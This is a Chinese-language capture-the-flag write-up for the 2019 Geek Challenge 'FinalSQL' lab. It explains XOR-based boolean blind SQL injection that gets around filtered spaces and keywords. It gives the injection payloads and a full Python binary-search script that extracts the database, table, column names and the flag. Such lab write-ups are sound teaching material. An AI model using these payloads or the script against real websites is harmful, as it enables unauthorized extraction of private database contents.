[极客大挑战 2019]FinalSQL

[极客大挑战 2019]FinalSQL

题型解析

本道题是考运用^（异或）来进行布尔盲注

上面几个有数字，预感是进行数字型的盲注

经过，字典爆破发现一些关键词都不能用。空格也被过滤，但是^没有

尝试一番后发现，不存在错误回显。因此，尝试盲注

利用^来进行布尔盲注

正确时：

0^1

错误时

0^0

开始脚本编写

获取数据库：

0^(ord(substr((select(database())),"+str(x)+",1))>"+str(mid)+")

获取表名：

0^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),"+str(x)+",1))>"+str(mid)+")

字段名：

0^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema='F1naI1y')),"+str(x)+",1))>"+str(mid)+")

获取flag

0^(ord(substr((select(group_concat(password))from(F1naI1y))," + str(x) + ",1))>" + str(mid) + ")

flag{95bc3f03-fbb8-4ef1-b31b-8dee9ca810f5}

完整脚本：

import requests
import time

url="http://8bf0bc1e-3d13-4d37-9342-dc640f9d2b08.node4.buuoj.cn:81/search.php"

# 0^(ord(substr(database(),1,1))>32)
def getDatabase():
    database_name=""
    for x in range(1,1000):
        low = 32
        hight = 127
        mid=(low+hight)//2
        while low < hight:
            params={
                "id":"0^(ord(substr((select(database())),"+str(x)+",1))>"+str(mid)+")"
            }
            r=requests.get(url=url,params=params)
            if "others~~~" in r.text:
                low = mid+1
            else:
                hight = mid
            mid=(low+hight)//2
        if low <=32 or hight >= 127:
            break
        database_name += chr(mid)
        print("数据库为：",database_name)

def getTable(): # 获取表名
    tables_name = ""
    for x in range(1,1000):
        left = 32
        right = 127
        mid=(left+right)//2
        while left < right:
            params = {
                "id" : "0^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),"+str(x)+",1))>"+str(mid)+")"
            }
            r=requests.get(url=url,params=params)
            if "others~~~" in r.text:
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if left < 32 or right > 127:
            break
        tables_name += chr(mid)
        print("table:",tables_name)
        time.sleep(1)
#  F1naI1y,Flaaaaag
def getColmun():
    column_name=""
    for x in range(1,1000):
        left=32
        right=127
        mid=(left+right)//2
        while left<right:
            while left < right:
                params = {
                    "id": "0^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y'))," + str(x) + ",1))>" + str(mid) + ")"
                }
                r = requests.get(url=url, params=params)
                if "others~~~" in r.text:
                    left = mid + 1
                else:
                    right = mid
                mid = (left + right) // 2
            if left < 32 or right > 127:
                break
            column_name += chr(mid)
            print("column:",  column_name)
            time.sleep(1)

def getFlag():
    flag=""
    for x in range(1,1000):
        left=32
        right=127
        mid=(left+right)//2
        while left<right:
            while left < right:
                params = {
                    "id": "0^(ord(substr((select(group_concat(password))from(F1naI1y))," + str(x) + ",1))>" + str(mid) + ")"
                }
                r = requests.get(url=url, params=params)
                if "others~~~" in r.text:
                    left = mid + 1
                else:
                    right = mid
                mid = (left + right) // 2
            if left < 32 or right > 127:
                break
            flag += chr(mid)
            print("flag:",  flag)
            time.sleep(1)
getDatabase()
getTable()
getColmun()
getFlag()

# flag{95bc3f03-fbb8-4ef1-b31b-8dee9ca810f5}

本次，布尔盲注采用了二分法查找，关于二分法可以看小恐龙的数的范围h